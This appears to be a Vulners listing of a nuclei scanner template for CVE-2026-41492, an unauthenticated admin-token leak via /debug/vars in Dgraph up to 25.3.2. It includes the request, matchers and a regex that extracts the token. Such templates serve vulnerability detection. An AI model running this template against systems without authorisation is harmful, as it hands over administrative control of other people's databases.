Lucene search
K

Dgraph <= 25.3.2 - Admin Token Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Dgraph versions up to 25.3.2 expose the admin token via unauthenticated access to the debug vars endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-41492
24 Apr 202618:29
attackerkb
Chainguard
CVE-2026-41492 vulnerabilities
9 May 202607:17
cgr
Circl
CVE-2026-41492
25 Apr 202601:30
circl
CNNVD
Dgraph 信息泄露漏洞
24 Apr 202600:00
cnnvd
CVE
CVE-2026-41492
24 Apr 202618:29
cve
Cvelist
CVE-2026-41492 Unauthenticated Admin Token Disclosure Leading to Authentication Bypass via /debug/vars in Dgraph
24 Apr 202618:29
cvelist
EUVD
EUVD-2026-25599
24 Apr 202618:29
euvd
Github Security Blog
Dgraph: Unauthenticated Admin Token Disclosure Leading to Authentication Bypass via /debug/vars
24 Apr 202616:15
github
NVD
CVE-2026-41492
24 Apr 202619:17
nvd
OSV
CGA-Q3PQ-442C-MP5F
9 May 202603:19
osv
Rows per page
id: CVE-2026-41492

info:
  name: Dgraph <= 25.3.2 - Admin Token Disclosure
  author: Divine Balija
  severity: critical
  description: |
    Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes  the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance.
  remediation: |
    Update to Dgraph version 25.3.3 or later.
  reference:
    - https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41492
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-41492
    epss-score: 0.02187
    epss-percentile: 0.80229
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: dgraph
    product: dgraph
    shodan-query: "Dgraph"
  tags: cve,cve2026,dgraph,exposure,token

http:
  - method: GET
    path:
      - "{{BaseURL}}/debug/vars"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "cmdline"
          - "token="
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'token=([^"\\]+)'
# digest: 490a0046304402207934b5a055bd2075ae43adcf5fe3718063d3d6c918bf5528f8319d48406f5a22022077b06f13f6dbf6e4de0d95cd5110445510fa6ba88535ce1e9d99c5e2c4688361:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Apr 2026 00:55Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.02187
SSVC
12